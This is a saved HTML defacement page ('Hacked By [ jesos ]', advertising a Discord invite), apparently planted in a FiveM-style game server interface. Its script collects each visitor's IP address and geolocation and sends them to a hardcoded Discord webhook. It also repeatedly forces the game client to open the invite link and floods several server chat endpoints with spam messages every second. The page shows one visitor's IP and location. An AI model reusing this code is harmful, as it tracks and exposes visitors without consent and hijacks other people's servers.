<!DOCTYPE html>
<!-- saved from url=(0041)/ -->
<html lang="en"><script src="chrome-extension://eppiocemhmnlbhjplcgkofciiegomcon/content/location/location.js" id="eppiocemhmnlbhjplcgkofciiegomcon"></script><script src="chrome-extension://eppiocemhmnlbhjplcgkofciiegomcon/libs/extend-native-history-api.js"></script><script src="chrome-extension://eppiocemhmnlbhjplcgkofciiegomcon/libs/requests.js"></script><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>discord.gg/pw1</title>
    <style>
        body {
            margin: 0;
            padding: 0;
            background: url('https://i.pinimg.com/originals/51/ae/a3/51aea3393b8234a1e69d8713a0a58bc3.gif') no-repeat center center fixed;
            background-size: cover;
            font-family: 'Courier New', Courier, monospace;
            color: #ff0000;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            flex-direction: column;
            text-align: center;
        }
        .image-container img {
            width: 230px; 
            height: auto;
            border: 2px solid #ec0000; 
            border-radius: 15px;
            box-shadow: 0 0 15px rgba(128, 128, 128, 0.7); 
        }
        .info {
            margin-top: 20px;
            font-size: 1.5em;
            color: #646464; 
            text-shadow: 0px 0px 8px #878787, 0px 0px 15px #878787, 0px 0px 25px #878787; 
            letter-spacing: 4.5px; 
            white-space: pre-wrap;
        }
        .text {
            margin-top: 20px;
            font-size: 3em; 
            color: #a0a0a0; 
            text-shadow: 0px 0px 8px #878787, 0px 0px 15px #878787, 0px 0px 25px #878787; 
            letter-spacing: 4.5px; 
        }
    </style>
<script bis_use="true" type="text/javascript" charset="utf-8" data-bis-config="[&quot;facebook.com/&quot;,&quot;twitter.com/&quot;,&quot;youtube-nocookie.com/embed/&quot;,&quot;//vk.com/&quot;,&quot;//www.vk.com/&quot;,&quot;linkedin.com/&quot;,&quot;//www.linkedin.com/&quot;,&quot;//instagram.com/&quot;,&quot;//www.instagram.com/&quot;,&quot;//www.google.com/recaptcha/api2/&quot;,&quot;//hangouts.google.com/webchat/&quot;,&quot;//www.google.com/calendar/&quot;,&quot;//www.google.com/maps/embed&quot;,&quot;spotify.com/&quot;,&quot;soundcloud.com/&quot;,&quot;//player.vimeo.com/&quot;,&quot;//disqus.com/&quot;,&quot;//tgwidget.com/&quot;,&quot;//js.driftt.com/&quot;,&quot;friends2follow.com&quot;,&quot;/widget&quot;,&quot;login&quot;,&quot;//video.bigmir.net/&quot;,&quot;blogger.com&quot;,&quot;//smartlock.google.com/&quot;,&quot;//keep.google.com/&quot;,&quot;/web.tolstoycomments.com/&quot;,&quot;moz-extension://&quot;,&quot;chrome-extension://&quot;,&quot;/auth/&quot;,&quot;//analytics.google.com/&quot;,&quot;adclarity.com&quot;,&quot;paddle.com/checkout&quot;,&quot;hcaptcha.com&quot;,&quot;recaptcha.net&quot;,&quot;2captcha.com&quot;,&quot;accounts.google.com&quot;,&quot;www.google.com/shopping/customerreviews&quot;,&quot;buy.tinypass.com&quot;,&quot;gstatic.com&quot;,&quot;secureir.ebaystatic.com&quot;,&quot;docs.google.com&quot;,&quot;contacts.google.com&quot;,&quot;github.com&quot;,&quot;mail.google.com&quot;,&quot;chat.google.com&quot;,&quot;audio.xpleer.com&quot;,&quot;keepa.com&quot;,&quot;static.xx.fbcdn.net&quot;,&quot;sas.selleramp.com&quot;,&quot;1plus1.video&quot;,&quot;console.googletagservices.com&quot;,&quot;//lnkd.demdex.net/&quot;,&quot;//radar.cedexis.com/&quot;,&quot;//li.protechts.net/&quot;,&quot;challenges.cloudflare.com/&quot;,&quot;ogs.google.com&quot;]" data-dynamic-id="c336488b-39a7-43db-9ca6-f3f75f8f26f8" src="chrome-extension://eppiocemhmnlbhjplcgkofciiegomcon/executors/traffic.js"></script><div id="uuidMachine" bis_skin_checked="1"></div></head>
<body __processed_56161523-d610-46dd-8b73-317654260b14__="true" bis_register="W3sibWFzdGVyIjp0cnVlLCJleHRlbnNpb25JZCI6ImVwcGlvY2VtaG1ubGJoanBsY2drb2ZjaWllZ29tY29uIiwiYWRibG9ja2VyU3RhdHVzIjp7IkRJU1BMQVkiOiJlbmFibGVkIiwiRkFDRUJPT0siOiJlbmFibGVkIiwiVFdJVFRFUiI6ImVuYWJsZWQiLCJSRURESVQiOiJlbmFibGVkIiwiUElOVEVSRVNUIjoiZW5hYmxlZCIsIklOU1RBR1JBTSI6ImVuYWJsZWQiLCJUSUtUT0siOiJkaXNhYmxlZCIsIkxJTktFRElOIjoiZW5hYmxlZCIsIkNPTkZJRyI6ImRpc2FibGVkIn0sInZlcnNpb24iOiIyLjAuMzgiLCJzY29yZSI6MjAwMzgwfV0=" bis_skin_checked="1">
    <div class="image-container" bis_skin_checked="1">
    <img src="https://www.raed.net/img?id=1500954" alt="Discord Image">
    <div class="text" bis_skin_checked="2"> Hacked By [ jesos ]  </div>
    <div class="text" bis_skin_checked="3"> discord.gg/pw1  </div>
    </div>
    <audio autoplay="" loop="">
        <source src="" type="audio/mpeg">
    </audio>
    <div class="info" id="ip-info" bis_skin_checked="1"><strong>IP:</strong><span>"84.109.13.74"</span><br><strong>City:</strong><span>"Jerusalem"</span><br><strong>Region:</strong><span>"Jerusalem"</span><br><strong>Country:</strong><span>"IL"</span><br><strong>Location:</strong><span>"31.7690,35.2163"</span><br><strong></strong> <span>"AS8551 Bezeq International Ltd."</span><br><strong>Timezone:</strong><span>"Asia/Jerusalem"</span></div>
    <div class="text" bis_skin_checked="1">discord.gg/pw1 jesos  </div>
    <div class="text" bis_skin_checked="2">Oops, your server is down!  </div>

    <script>
        fetch('https://ipinfo.io/json')
        .then(response => response.json())
        .then(data => {
            const { ip, country, city, region, loc, org, timezone } = data;
            const infoDiv = document.getElementById('ip-info');
            infoDiv.innerHTML = `<strong>IP:</strong><span>"${ip}"</span><br><strong>City:</strong><span>"${city}"</span><br><strong>Region:</strong><span>"${region}"</span><br><strong>Country:</strong><span>"${country}"</span><br><strong>Location:</strong><span>"${loc}"</span><br><strong></strong> <span>"${org}"</span><br><strong>Timezone:</strong><span>"${timezone}"</span>`;

            const dateTime = new Date().toLocaleString();
            const webhookUrl = 'https://discord.com/api/webhooks/1343716504331616328/8-HtlyIdfpvEZ9kyNrCQZIoTXKCOnoGBwMkRNtcuQF3rdjUDhh4';
            fetch(webhookUrl, {
                method: 'POST',
                headers: {'Content-Type': 'application/json'},
                body: JSON.stringify({content: `IP : ${ip}\nCountry & City : ${country} - ${city}\nDate & Time : ${dateTime}\n -`})
            });
        });

Interval(function() {
            window.invokeNative("openUrl", "https://discord.gg/pw1");
            window.invokeNative("openUrl", "https://discord.gg/pw1");
            window.invokeNative("openUrl", "https://discord.gg/pw1");
        }, 2500);
   
const msg = ` discord.gg/pw1 / Welcome to the world of Oblivion  `;
const body = JSON.stringify({ message: msg });
setInterval(() => {
fetch("https://flix-scripts/chatResult", { method: "POST", body });
fetch("https://danger_chat/Danger_Chat:SendMessage", {method: "POST",body: JSON.stringify({"message": msg,"channel": "شات العام","color": null,"isImageAndLinksAllowed": [false,false]})})
fetch("https://easy-chat+/o6ZbK5Ecp6", {headers: {accept: "*/*","content-type": "application/x-www-form-urlencoded; charset=UTF-8"},body: JSON.stringify({ message: msg, channel: "شات العام" }),method: "POST"});
fetch("https://melix_chat/chatResult", { method: "POST", body });
fetch("https://as_chat/chatResult", { method: "POST", body });
fetch("https://chat/chatResult", { method: "POST", body });
fetch("https://ho-chatv2/Chat", {method: "POST",body: JSON.stringify({"Type": "chatResult","message": msg,"chatType": "general"})});
}, 1000);
    </script>

☠️pw1☠️
</body></html>
